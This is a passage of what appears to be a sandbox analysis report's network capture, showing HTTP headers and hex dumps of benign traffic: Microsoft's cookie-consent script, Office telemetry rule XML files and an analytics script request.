                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:04 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 52717
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                      Age: 34590
                                                                                                                                                                                                                      Cache-Control: max-age=43200
                                                                                                                                                                                                                      Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                                      Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                                      Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                      x-ms-request-id: 4aa39486-701e-007b-0f1a-3b6206000000
                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                      x-azure-ref: 20241120T164204Z-r1d97b9957744xz5hC1TEB5bf80000000930000000002hx7
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                      Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                                      Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC82INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20
                                                                                                                                                                                                                      Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" +
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC16384INData Raw: 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 66 6f 63 75 73 3a 3a 62 65 66 6f 72 65 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72
                                                                                                                                                                                                                      Data Ascii: label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:focus::before {\n border: 1px solid "+e["radio-button-hover-border
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC4196INData Raw: 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 29 3a 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 74 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 2c 65 2e 63 6f 6f 6b 69 65 4e 61 6d 65 3d 22 4d 53 43 43 22 2c 65
                                                                                                                                                                                                                      Data Ascii: .length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEventListener(t,o):e.attachEvent("on"+t,(function(){o.call(e)}))},e.cookieName="MSCC",e


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      97192.168.2.74982013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:04 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                      x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164204Z-185f5d8b95csp6jmhC1NYCwy6s0000000ah000000000650e
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:04 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      98192.168.2.74982313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:05 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                      x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164205Z-1777c6cb754n67brhC1TEBcp9c00000009z0000000007stp
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      99192.168.2.74982613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:05 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:06 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                      x-ms-request-id: 96e0b134-501e-0035-148c-3ac923000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164206Z-r1d97b99577d6qrbhC1TEBux5s000000094g00000000ud97
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      100192.168.2.74982713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:06 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                      x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164206Z-r1d97b99577hc74hhC1TEBvbns000000091g000000005523
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      101192.168.2.74982813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:06 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                      x-ms-request-id: e045c2d1-201e-003c-718c-3a30f9000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164206Z-1777c6cb754xrr98hC1TEB3kag00000009t0000000003qh9
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      102192.168.2.74982913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:07 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                      x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164207Z-1777c6cb754dqb2khC1TEBmk1s00000009q000000000y045
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:07 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      103192.168.2.74983013.107.246.634436380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:06 UTC633OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: js.monitor.azure.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
